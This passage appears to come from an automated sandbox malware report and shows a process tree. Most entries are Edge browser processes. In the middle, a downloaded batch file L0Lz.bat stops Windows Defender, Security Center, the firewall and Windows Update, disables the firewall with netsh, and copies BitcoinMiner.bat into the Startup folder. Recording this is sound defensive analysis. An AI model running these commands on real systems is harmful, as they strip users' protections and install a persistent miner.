    3⤵
    PID:1768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
    3⤵
    PID:5932
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
    3⤵
    PID:4624
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
    3⤵
    PID:5564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1788 /prefetch:8
    3⤵
    PID:6116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
    3⤵
    PID:5204
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\L0Lz.bat" "
    3⤵
    PID:4156
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:5880
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4416
  - - C:\Windows\system32\net.exe
      net stop "SDRSVC"
      4⤵
      PID:2624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SDRSVC"
        5⤵
        
        PID:1224
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:4596
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:2292
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im "MSASCui.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2588
  - - C:\Windows\system32\net.exe
      net stop "security center"
      4⤵
      PID:5864
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "security center"
        5⤵
        
        PID:1124
  - - C:\Windows\system32\net.exe
      net stop sharedaccess
      4⤵
      PID:4032
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop sharedaccess
        5⤵
        
        PID:916
  - - C:\Windows\system32\netsh.exe
      netsh firewall set opmode mode-disable
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:6060
  - - C:\Windows\system32\net.exe
      net stop "wuauserv"
      4⤵
      PID:2572
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wuauserv"
        5⤵
        
        PID:5340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo tasklist "
      4⤵
      PID:5848
  - - C:\Windows\system32\find.exe
      find /I "L0Lz"
      4⤵
      PID:1548
  - - C:\Windows\system32\xcopy.exe
      XCOPY "BitcoinMiner.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
      4⤵
      Drops startup file
      PID:5576
  - - C:\Windows\system32\xcopy.exe
      XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
      4⤵
      PID:3748
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5896 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:1
    3⤵
    PID:1916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
    3⤵
    PID:3004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
    3⤵
    PID:4792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
    3⤵
    PID:4672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
    3⤵
    PID:3180
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
    3⤵
    PID:428
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1728 /prefetch:1
    3⤵
    PID:5700
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
    3⤵
    PID:2300
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
    3⤵
    PID:5988
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7648 /prefetch:1
    3⤵
    PID:264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
    3⤵
    PID:1740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8036 /prefetch:1
    3⤵
    PID:3296
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8200 /prefetch:1
    3⤵
    PID:3608
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8052 /prefetch:1
    3⤵
    PID:5940
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8528 /prefetch:1
    3⤵
    PID:4336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:1
    3⤵
    PID:5876
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1132 /prefetch:1
    3⤵
    PID:4128
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8792 /prefetch:1
    3⤵
    PID:2904
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8944 /prefetch:1
    3⤵
    PID:4080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8656 /prefetch:1
    3⤵
    PID:5648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8644 /prefetch:1
    3⤵
    PID:5708
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:1
    3⤵
    PID:2004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9132 /prefetch:1
    3⤵
    PID:408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9692 /prefetch:1
    3⤵
    PID:5880
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9852 /prefetch:1
    3⤵
    PID:6604
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8408 /prefetch:1
    3⤵
    PID:6932
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9952 /prefetch:1
    3⤵
    PID:6952
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9180 /prefetch:1
    3⤵
    PID:6960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:1
    3⤵
    PID:7144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9652 /prefetch:1
    3⤵
    PID:220
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
    3⤵
    PID:4740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9068 /prefetch:1
    3⤵
    PID:4292
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
    3⤵
    PID:4272
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1
    3⤵
    PID:6512
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:1
    3⤵
    PID:4620
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9596 /prefetch:1
    3⤵
    PID:5768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9740 /prefetch:1
    3⤵
    PID:3208
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8804 /prefetch:1
    3⤵
    PID:4636
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8352 /prefetch:1
    3⤵
    PID:6288
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
    3⤵
    PID:1560
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
    3⤵
    PID:4276
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
    3⤵
    PID:6568
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9268 /prefetch:1
    3⤵
    PID:4080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
    3⤵
    PID:6580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8584 /prefetch:1
    3⤵
    PID:6588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8280 /prefetch:1
    3⤵
    PID:6784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8792 /prefetch:1
    3⤵
    PID:7112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10236 /prefetch:1
    3⤵
    PID:7100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8832 /prefetch:1
    3⤵
    PID:7124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
    3⤵
    PID:5700
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10140 /prefetch:8
    3⤵
    PID:6012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8304 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1380
- - C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe
    "C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:6160
  - - C:\Users\Admin\Downloads\RKill_V2.9.1.064.exe
      C:\Users\Admin\Downloads\RKill_V2.9.1.0.exe
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
